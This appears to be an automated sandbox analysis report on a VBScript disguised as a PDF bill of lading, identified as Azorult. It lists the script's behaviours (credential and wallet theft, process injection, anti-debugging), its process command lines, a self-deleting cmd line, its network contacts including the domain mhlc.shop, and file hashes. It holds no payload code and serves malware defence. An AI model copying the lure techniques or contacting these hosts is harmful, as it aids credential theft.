Analysis Overview
SHA256
1562364a3048ef8e00720e3bc0c6588ed7a4d8f560c5bdafa5b19503e159a8a8
Threat Level: Known bad
The file DRAFT BILL OF LADING.PDF.vbs was found to be: Known bad.
Malicious Activity Summary
Azorult
Blocklisted process makes network request
Loads dropped DLL
Reads local data of messenger clients
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
outlook_win_path
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-12 07:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-12 07:14
Reported
2024-03-12 07:16
Platform
win7-20240221-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Azorult
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Reads local data of messenger clients
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2032 set thread context of 1420 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRAFT BILL OF LADING.PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "wab.exe"
C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| GB | 23.48.165.155:80 | repository.certum.pl | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | mhlc.shop | udp |
| US | 104.21.23.20:80 | mhlc.shop | tcp |
| US | 104.21.23.20:80 | mhlc.shop | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab141F.tmp
C:\Users\Admin\AppData\Local\Temp\Tar1422.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Tar162D.tmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\429AI7V21ZIDY7Q1GU55.temp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
\Users\Admin\AppData\Local\Temp\99E8C950\msvcp140.dll
\Users\Admin\AppData\Local\Temp\99E8C950\mozglue.dll
\Users\Admin\AppData\Local\Temp\99E8C950\nss3.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-filesystem-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-utility-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-environment-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-time-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-multibyte-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-math-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-locale-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-convert-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-stdio-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-heap-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-string-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-runtime-l1-1-0.dll
\Users\Admin\AppData\Local\Temp\99E8C950\vcruntime140.dll
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-12 07:14
Reported
2024-03-12 07:16
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
142s
Command Line
Signatures
Azorult
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2624 set thread context of 4300 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = … | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = … | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = … | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRAFT BILL OF LADING.PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3472 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | | tcp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| NL | 142.250.179.142:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| NL | 142.251.36.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | mhlc.shop | udp |
| US | 104.21.23.20:80 | mhlc.shop | tcp |
| US | 8.8.8.8:53 | 20.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fu5ynqbe.pjh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |